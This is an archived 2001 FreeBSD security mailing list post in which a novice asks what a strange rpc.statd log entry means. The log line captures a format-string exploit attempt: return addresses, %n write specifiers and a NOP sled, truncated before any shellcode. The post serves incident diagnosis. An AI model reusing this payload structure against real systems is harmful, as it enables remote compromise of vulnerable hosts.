From owner-freebsd-security  Sun Jun  3 23:30:48 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailhub.cns.ksu.edu (grunt.ksu.ksu.edu [129.130.12.17])
	by hub.freebsd.org (Postfix) with ESMTP id 8DDEC37B401
	for <freebsd-security@freebsd.org>; Sun,  3 Jun 2001 23:30:43 -0700 (PDT)
	(envelope-from jdt2101@ksu.edu)
Received: from unix1 (jdt2101@unix1.cc.ksu.edu [129.130.12.3])
	by mailhub.cns.ksu.edu (8.9.1/8.9.1/mailhub+tar) with SMTP id BAA28276
	for <freebsd-security@freebsd.org>; Mon, 4 Jun 2001 01:30:42 -0500 (CDT)
Received: from localhost by unix1 (SMI-8.6/1.34)
	id BAA03292; Mon, 4 Jun 2001 01:30:42 -0500
Date: Mon, 4 Jun 2001 01:30:42 -0500 (CDT)
From: Josh Thomas <jdt2101@ksu.edu>
X-Sender: jdt2101@unix1.cc.ksu.edu
To: freebsd-security@freebsd.org
Subject: rpc.statd attack before ipfw activated
In-Reply-To: <3B1A92C6.8030301@bsd.st>
Message-ID: <Pine.GSO.4.21L.0106040126530.3155-100000@unix1.cc.ksu.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

I didn't set up ipfw for a couple of days in between setting up a small
nfs server for an in-home lan, and I got this in my system log.  I realize
that I should have set up ipfw before doing this now, but any ideas what
just happened?  Here is the log:
Jun  2 19:36:41 thatguys rpc.statd: invalid hostname to
sm_stat: ^X\xf7\xff\xbf^
X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7\xff\xbf^[\xf7\xff\
xbf^[\xf7\xff\xbf%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P
Jun  2 19:36:41 thatguys /kernel: PM-^PM-^PM-^P

And it cut off there.  This is a home machine, and yes, I realize that a
firewall should have been running first, however, I didn't have time.  I'm
a relative novice to rpc and nfs in general, so any clues would be
appreciated.  Thanks,

Josh Thomas
Student Systems Analyst
Engineering Computing Center
Kansas State University



To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message